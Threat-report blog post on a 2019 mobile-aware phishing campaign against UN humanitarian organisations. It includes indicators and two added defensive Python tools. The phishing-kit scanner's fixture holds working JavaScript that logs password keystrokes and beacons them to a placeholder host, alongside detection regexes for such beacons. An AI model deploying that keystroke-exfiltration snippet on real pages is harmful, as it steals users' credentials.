October 14, 2019

Phishing Attack Targeting UN Discovered by Lookout Phishing AI

Entry Type: Threat Summary
Threat Type: Phishing

Lookout Phishing AI has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but as of the publication of this blog the attack is still ongoing.

Background on the phishing campaign

The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.

Mobile-aware functionality and keylogging

Lookout has identified several noteworthy techniques employed in this campaign, including its ability to detect mobile devices and to log keystrokes directly as they are entered in the password field.

Specifically, JavaScript logic on the phishing pages detects whether the page is being loaded on a mobile device and, if so, delivers mobile-specific content. Mobile web browsers also unintentionally help obscure phishing URLs by truncating them, making it harder for victims to spot the deception.

Lookout has also collected evidence of key logging functionality embedded in the password field of the phishing login pages, such that, if a target doesn’t complete the login activity by pressing the login button or if they enter another, unintended password, this information is still sent back to the command and control infrastructure operated by the malicious actor.
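The two behaviours described above, a user-agent check that switches the page into a mobile variant and a per-keystroke handler on the password field that reports to a remote endpoint, both leave traces in the page source that an analyst can look for when triaging a captured phishing kit. The following static heuristic scanner is an added example written for this post; it is not Lookout's detection logic or code from the campaign. The two HTML documents, the `c2.example` beacon URL and the element ids are constructed fixtures, and the patterns are deliberately simple indicators rather than a complete detector.

```python
import re

# Constructed fixture modelled on the behaviours the report describes: a
# user-agent check that flips the page into a mobile layout, and a keyup
# handler on the password field that beacons each keystroke. Placeholder
# host (c2.example), not a real page from the campaign.
SUSPECT_PAGE = """
<form id="login" action="/post.php" method="post">
  <input type="email" name="user" id="user">
  <input type="password" name="pass" id="pass">
  <button type="submit">Sign in</button>
</form>
<script>
var isMobile = /Android|iPhone|iPad|Mobile/i.test(navigator.userAgent);
if (isMobile) { document.body.classList.add('m'); }
document.getElementById('pass').addEventListener('keyup', function(e) {
  new Image().src = 'https://c2.example/log?k=' + encodeURIComponent(e.target.value);
});
</script>
"""

# Constructed benign login form: the password value only leaves the page on
# form submission, and there is no user-agent sniffing.
BENIGN_PAGE = """
<form id="login" action="/login" method="post">
  <input type="password" name="pass" id="pass">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById('login').addEventListener('submit', function () {});
</script>
"""

# Indicators: key/input event handlers registered from script ...
KEY_EVENTS = re.compile(r"""addEventListener\(\s*['"](keyup|keydown|keypress|input)['"]""")
# ... or attached inline on the <input> element itself.
ON_ATTRS = re.compile(r"""\bon(keyup|keydown|keypress|input)\s*=""", re.I)
# Common ways script sends data out of the page.
BEACONS = re.compile(r"""(new\s+Image\(\)\.src|fetch\(|XMLHttpRequest|navigator\.sendBeacon|\$\.(ajax|post|get)\()""")
# User-agent sniffing paired with a mobile-looking regex literal.
UA_SNIFF = re.compile(r"navigator\.userAgent")
MOBILE_PATTERN = re.compile(r"/[^/\n]*(Android|iPhone|Mobile)[^/\n]*/i?")

INPUT_TAG = re.compile(r"<input\b[^>]*>", re.I)
PASSWORD_TYPE = re.compile(r"""type\s*=\s*['"]?password""", re.I)


def password_inputs(html):
    """Return the raw <input> tags whose type is password."""
    return [t for t in INPUT_TAG.findall(html) if PASSWORD_TYPE.search(t)]


def password_field_ids(html):
    """Return the id attribute of every password input (ids are how script reaches them)."""
    ids = []
    for tag in password_inputs(html):
        m = re.search(r"""\bid\s*=\s*['"]([^'"]+)['"]""", tag, re.I)
        if m:
            ids.append(m.group(1))
    return ids


def scan_page(html):
    """Flag keystroke capture on password fields, outbound beacons, and mobile cloaking."""
    scripts = "\n".join(re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.I | re.S))
    pw_ids = password_field_ids(html)

    # Script-registered key handler that also references a password field id.
    key_handler = bool(KEY_EVENTS.search(scripts)) and any(pid in scripts for pid in pw_ids)
    # Inline onkeyup/onkeydown/... directly on a password input.
    inline_handler = any(ON_ATTRS.search(tag) for tag in password_inputs(html))
    captures_keys = key_handler or inline_handler
    beacons = bool(BEACONS.search(scripts))

    return {
        "password_fields": pw_ids,
        "keystroke_capture": captures_keys,
        "outbound_beacon": beacons,
        # Both together is the pattern the report describes.
        "keystroke_exfil": captures_keys and beacons,
        "mobile_cloaking": bool(UA_SNIFF.search(scripts) and MOBILE_PATTERN.search(scripts)),
    }


if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_page(page))
```

Run over a captured page, the scanner reports `keystroke_exfil` only when a key or input handler touches a password field and some outbound channel exists in the same page, which keeps ordinary forms with client-side validation from triggering it; `mobile_cloaking` is reported separately, since a page that serves different content by user agent is worth fetching a second time with a mobile user agent before any verdict is reached.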

SSL certificates and humanitarian aid domains

All major browsers alert users when a site presents an expired SSL certificate. Because these warnings are very clear (and in fact often hard to dismiss), it would be near impossible to entice a user to enter login credentials on a site that uses an expired certificate. As a result, the expired SSL certificates observed on some of the phishing sites provide insight into the time period during which the attack was active.

SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Currently six certificates are still valid, and Lookout suspects that these attacks may still be ongoing. A table at the end of this blog shows the targeted organizations, the URLs targeting them as well as whether the current SSL certificate on the site is valid as of writing this report.
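The reasoning above, that a phishing site is only usable while its certificate is within its validity window, can be turned into a small timeline tool: given the notBefore/notAfter values of each certificate, compute the overall activity window and which hosts could still present a valid certificate on a given date. This is an added example for this post, not Lookout's own tooling. The validity strings use the format that Python's `ssl.getpeercert()` returns and are parsed with the standard-library `ssl.cert_time_to_seconds`; the dates are the two validity ranges named in the report, while the hostnames and exact times are constructed placeholders.

```python
import ssl
from datetime import datetime, timezone

# Constructed records in the notBefore/notAfter string form used by
# ssl.getpeercert(). The two date ranges are the ones reported for the
# campaign; hostnames and clock times are placeholders.
SAMPLE_CERTS = [
    {"host": "phish-a.example", "notBefore": "May  5 00:00:00 2019 GMT", "notAfter": "Aug  3 23:59:59 2019 GMT"},
    {"host": "phish-b.example", "notBefore": "Jun  5 00:00:00 2019 GMT", "notAfter": "Sep  3 23:59:59 2019 GMT"},
    {"host": "phish-c.example", "notBefore": "Jun  5 00:00:00 2019 GMT", "notAfter": "Sep  3 23:59:59 2019 GMT"},
]


def parse_cert_time(value):
    """Convert an OpenSSL-style 'Mon DD HH:MM:SS YYYY GMT' string to an aware UTC datetime."""
    return datetime.fromtimestamp(ssl.cert_time_to_seconds(value), tz=timezone.utc)


def cert_status(cert, as_of):
    """'valid', 'expired' or 'not_yet_valid' for one certificate on the given date."""
    not_before = parse_cert_time(cert["notBefore"])
    not_after = parse_cert_time(cert["notAfter"])
    if as_of < not_before:
        return "not_yet_valid"
    if as_of > not_after:
        return "expired"
    return "valid"


def live_hosts(certs, as_of):
    """Hosts whose certificate would not trigger an expiry warning on the given date."""
    return sorted(c["host"] for c in certs if cert_status(c, as_of) == "valid")


def campaign_window(certs):
    """Earliest notBefore and latest notAfter across all observed certificates."""
    starts = [parse_cert_time(c["notBefore"]) for c in certs]
    ends = [parse_cert_time(c["notAfter"]) for c in certs]
    return min(starts), max(ends)


if __name__ == "__main__":
    start, end = campaign_window(SAMPLE_CERTS)
    print("certificate-backed window:", start.date(), "to", end.date())
    for day in ("2019-07-01", "2019-08-15", "2019-09-10"):
        as_of = datetime.fromisoformat(day).replace(tzinfo=timezone.utc)
        print(day, "live hosts:", live_hosts(SAMPLE_CERTS, as_of))
```

The window this yields is a lower bound on the campaign's lifetime, not an upper one: the infrastructure was live before the first certificate was issued, and an operator can renew. What the check does give a defender is a date after which a given hostname could no longer have collected credentials without a browser warning, which is useful when deciding how far back to search authentication logs for visits to those hosts.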

A sample of one of the live phishing sites discovered by Lookout researchers. Top: The legitimate login page targeted by this phishing attack. Bottom: The phishing site mimicking the legitimate Office365 login page for employees of the International Federation of Red Cross and Red Crescent Societies.

Lookout Phishing and Content Protection

The mobile-aware component found in this campaign is further proof that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a source of increasing risk for enterprises, as the post-perimeter world and widespread adoption of bring your own device (BYOD) policies blur the lines between personal devices and corporate networks, not to mention the expanded multi-channel threat surface presented by such devices and mobility as a whole.

Lookout Phishing & Content Protection goes beyond traditional phishing channels and detects phishing attacks from all types of sources, including personal and corporate email, social media, SMS and other messaging and apps. Lookout also detects access to malicious sites, including malware and spyware distribution, command and control servers, and botnets — from URLs delivered by any app or channel on a user’s device.
